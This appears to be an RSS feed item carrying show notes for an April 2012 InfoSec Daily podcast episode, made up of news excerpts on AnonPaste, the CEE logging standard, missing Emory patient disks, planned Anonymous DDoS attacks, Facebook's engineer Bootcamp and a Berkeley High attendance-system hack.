<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://news.techworld.com/personal-tech/3352311/anonymous-launches-anonpaste-alternative-pastebincom"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.techworld.com/personal-tech/3352311/anonymous-launches-anonpaste-alternative-pastebincom</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.peoplesliberationfront.net/anonpaste/index.php?f77e6760ee863006#GZIF9S28dOZ7Qhs4FhbEAftRk5NPIFDqlstEzF9hR2A="><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.peoplesliberationfront.net/anonpaste/index.php?f77e6760ee863006#GZIF9S28dOZ7Qhs4FhbEAftRk5NPIFDqlstEzF9hR2A=</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Anonymous hacking collective has launched a new site that it claims will allow users to post material without fear of being tracked down.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous described the new site, dubbed AnonPaste, as a safer site than Pastebin.com, which has been used by hackers to post evidence of their exploits.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a joint statement issued Tuesday, Anonymous and a group calling itself the People&#39;s Liberation Front said the new site will allow people to post any material with complete anonymity.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The statement said posts to the new site would not be censored or moderated in any way.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The two groups said AnonPaste offers 256-bit AES encryption at the browser layer. All data posted to the site will be encrypted and decrypted in the browser so no &quot;usable paste data [is] stored on the server for the authorities or anyone else to seize,&quot; the statement claimed.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;There will be no need for us to police this service, and in fact we don&#39;t even have the ability of deleting any particular paste,&quot; it said.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AnonPaste supports a URL shortening feature and allows users to post up to 2MB of text snippets at a time. Users can specify how long they want the text to remain available on the site.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Pastebin.com was originally created for programmers to temporarily store and share snippets of code and configuration information. Over the years, people have used the site to post and share all sorts of documents and has become a favorite for hackers looking to publicize details of their exploits.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous, LulzSec and other groups routinely post documents obtained from hacking attacks. Often, the documents posted on Pastebin have included personal, financial and confidential information of individuals and businesses.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous and the People&#39;s Liberation Front said AnonPaste was launched after learning that Pastebin.com may move to censor content and pass on the IP addresses of people posting on its site to law enforcement authorities.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.networkworld.com/community/node/80324"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.networkworld.com/community/node/80324</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://cee.mitre.org/docs/overview.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://cee.mitre.org/docs/overview.html</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Enter the Common Event Expression (CEE) standard, a group effort being championed by Mitre Corporation. &nbsp;Other participants include Cisco, HP/ArcSight, McAfee, NIST, and Microsoft. &nbsp;CEE seeks to solve a basic problem that doesn&#39;t get enough attention. &nbsp;Every IT device and application generates log files but there really are no standards for how these logs present their data. &nbsp;As a result, you either have to learn what the log files are telling you or develop technologies to normalize these logs into some common and useable format. &nbsp;It&#39;s easy to see how this has become such a big problem &#8212; more IT stuff, more logs of different flavors that needs to be collected, normalized, processed, etc. </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CEE is designed to address this problem from cradle to grave by defining common event definitions, enumeration, classification, languages, transport protocols, etc. &nbsp;In other words, everything to event/log production to event/log consumption is covered. </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mitre is no stranger to security standards, think CVE (Common Vulnerability Enumeration). &nbsp;That said, CEE is not the only game in town. &nbsp;The Linux community has something called &quot;Project Lumberjack,&quot; Verizon touts a standard called Verizon Enterprise Risk and Incident Sharing (VERIS), and the IETF is playing in this space as well. &nbsp;CEE doesn&#39;t necessarily compete with these other efforts however since it is extensible and could work in concert with other standards.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I noticed that Sensage and Tripwire have announced support for CEE and would encourage others to do the same. &nbsp;CEE is not a panacea by any means, but enterprise organizations need better security intelligence and analytics ASAP and no one should expect them to invest years of time and tens of millions of dollars to piece together customer solutions. &nbsp;Security standards like CEE can go a long way toward expediting common security data standards, wider data exchange, and deeper analysis. &nbsp;For that reason alone, the security technology industry should be much more engaged.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://www.11alive.com/news/article/238755/40/Emory-Healthcare-missing-info-on-patients-from-17-year-period"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.11alive.com/news/article/238755/40/Emory-Healthcare-missing-info-on-patients-from-17-year-period</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Emory Healthcare says they are missing 10 data disks of information on surgical patients from between 1990 and 2007 from a storage location at Emory University Hospital.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Officials released a statement Wednesday afternoon that said as soon as they discovered the disks were missing, that an exhaustive search began. The search and investigation is continuing.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to the university, the disks were removed from their storage location at some point between February 7 and February 20, 2012. The disks came from an old computer system that was deactivated in 2007.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Officials insist there is no indication the information has been misused in any way. They also insist this is not a breach or hacking of their systems.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://www.zdnet.co.uk/blogs/security-bulletin-10000166/anonymous-to-launch-attacks-on-govt-mcdonalds-10025916/?s_cid=938"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.zdnet.co.uk/blogs/security-bulletin-10000166/anonymous-to-launch-attacks-on-govt-mcdonalds-10025916/?s_cid=938</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Groups of Anonymous hacktivists from around the world plan to focus distributed denial-of-service attacks on organisations including the Home Office, GCHQ, and McDonald&#39;s on Saturday.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Activists from Sweden, Brazil, the US and Russia will participate in attacks on the websites of the Home Office, GCHQ, MI5, MI6, Theresa May, Number 10, the Supreme Court, McDonald&#39;s, EDL, BNP, the Be my Parent adoption agency, and Justice, members of UK Anonymous group AnonAteam</span><a href="https://twitter.com/#%21/tomespiner/status/192636251785019392"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">told ZDNet UK</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> via an</span><a href="http://www.spreaker.com/page#%21/user/anonfamily/18_04_2012_anonateam"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">internet radio broadcast</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> on Wednesday.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We&#39;ve scanned [GCHQ and the Home Office],&quot; Anonymous hacker &#39;Winston Smith&#39; said. &quot;We&#39;ve uncovered paths we didn&#39;t realise were available, from the scans that we&#39;ve done.&quot;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A hacker identified as &#39;Murdoch&#39; directed ZDNet UK to a</span><a href="http://pastebin.com/DN0Aqiyc"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> Pastebin document</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &mdash; purportedly the results of scans of systems of the organisations to be targeted.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;GCHQ is running on Linux 2.6.18 and has got port 80 open,&quot; Smith told ZDNet UK. &quot;We will try to attack four [GCHQ] ports.&quot;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Smith said that Anonymous had gleaned information from a failed attempt to take down the GCHQ website last weekend.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;[GCHQ] moved around some of the pages we were attacking before &mdash; we couldn&#39;t analyse the traceroutes,&quot; said Smith. &quot;There will be three or four types of attack, using three or four types of technology. We have agreed with other groups to attack together.&quot;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Home Office website was attacked during the course of the radio broadcast on Wednesday, and was intermittently up and down, according to checks made by ZDNet UK.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Before those disruptions, a Home Office spokesman said the government department was bracing itself for attacks.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://www.thenewstribune.com/2012/04/18/2111929/facebooks-rite-of-passage-into.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.thenewstribune.com/2012/04/18/2111929/facebooks-rite-of-passage-into.html</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Welcome to Facebook!&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Underneath, printed in big, bold, red letters, are slogans like: &quot;We Hack Therefore We Are,&quot; or &quot;Move Fast and Break Things.&quot; Within days, your software code will be in front of our more than 845 million users.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">And so begins the six-week journey of a new employee class in Facebook&#39;s &quot;Bootcamp,&quot; an experience shared by every engineering hire, whether they are a grizzled Silicon Valley veteran or a fresh-faced computer science grad. Since 2008, hundreds of Facebook&#39;s engineers have passed through Bootcamp, which may lack the physical tests of military basic training but does provide the same kind of shared experience and cultural indoctrination into the world&#39;s largest social network.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Bootcamp is one part employee orientation, one part software training program and one part fraternity/sorority rush. When new engineering recruits are hired at Facebook, they typically do not know what job they will do. They choose their job assignment and product team at the culmination of Bootcamp, a program that exemplifies Facebook&#39;s adherence to founder and CEO Mark Zuckerberg&#39;s &quot;Hacker Way,&quot; an organizational culture that is supposed to be egalitarian, risk-taking, self-starting, irreverent, collaborative and creative.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Each new recruit needs to take a deep breath. Within a few days, all are expected to be pushing live software updates out to the better part of a billion users. If a Bootcamper crashes part of Facebook doing that, well, it won&#39;t be the first time.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;I would describe it as a way for us to educate our engineers not only on how we code and how we do our systems, but also how to culturally think about how to attack challenges and how to meet people,&quot; said Joel Seligstein, the head of the Bootcamp program, who might be described as Facebook&#39;s answer to Yoda. &quot;We like to teach what&#39;s important very early on, on Day 1. I would say it&#39;s even more of a cultural program than it is a teaching program.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">From &quot;the HP Way&quot; at Hewlett-Packard to Google&#39;s sense of what&#39;s &quot;Googley,&quot; company culture is a mainstay of Silicon Valley life. With workplace perks like free gourmet food and other amenities, life at Facebook doesn&#39;t look much different on the surface from Google, Zynga, Twitter or many other young, fast-growing Internet companies.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" id="internal-source-marker_0.30503137209399" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.nbcbayarea.com/news/local/Berkeley-High-School-Uncovers-Attendance-Scam-148023145.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.nbcbayarea.com/news/local/Berkeley-High-School-Uncovers-Attendance-Scam-148023145.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">About 50 Berkeley High School students will be suspended and up to four could be expelled for a recently discovered scheme in which students hacked into the school&#39;s attendance system and sold cleared absences to classmates, school administrators said Wednesday.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">School staff discovered the breach in the school&#39;s attendance system while reviewing student data a few weeks ago, according to Principal Pasquale Scuderi. Administrators found that several student accounts in the school&#39;s attendance database, called Powerschool, appeared to have unauthorized changes to their attendance records last fall.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Further investigation revealed that at least four students got their hands on an administrative password that allows access to Powerschool, then logged in and cleared absences or tardy marks on classmates&#39; records for a fee, Scuderi said. The principal did not disclose how much money the students exchanged, but said an investigation by district technical staff and administrators showed that about 50 students participated in the scam.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;The degree of involvement ranged from what we now know was a few students literally selling the clearance of absences to those who may have accepted having a few absences or tardies cleared by a friend or acquaintance who gained access,&quot; the principal said in a statement.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Scuderi said he believes the expulsion of those students who launched the scam is an appropriate response, considering the number of administrative hours spent to investigate the scheme as well as the &quot;flagrant dishonesty exhibited&quot;.The principal said that while he is disappointed in the students, he hopes the incident will be a teachable moment for staff and parents and is encouraged by current attendance records for the school&#39;s 3,200 students.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The school&#39;s attendance record rose to 94 percent for the first seven months of the school year compared to 92 percent during the same period last year. Over the past year, the school has made attendance a top priority, hiring a dean of attendance to oversee the school&#39;s attendance process and crack down on chronic truancy, the principal said. Scuderi credited the school&#39;s addition this year of a dean of attendance as well as the school&#39;s teachers for keeping attendance levels high.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline;">&#8230;.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-649-anonpaste-cee-emory-healthcare-saturdays-targets-hacker-way-and-tardy-be-gone/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3792/0/infosec-daily-podcast-episode-649.mp3" length="56804919" type="audio/mpeg" />
		<itunes:duration>0:39:26</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 649 for April 19, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw and Karthik Rangarajan.
&#160;
Announcements
Outerz0ne 8
	When: April 20-21, 2012
	Where: Wellesley Inn, Atlanta GA
[...]</itunes:subtitle>
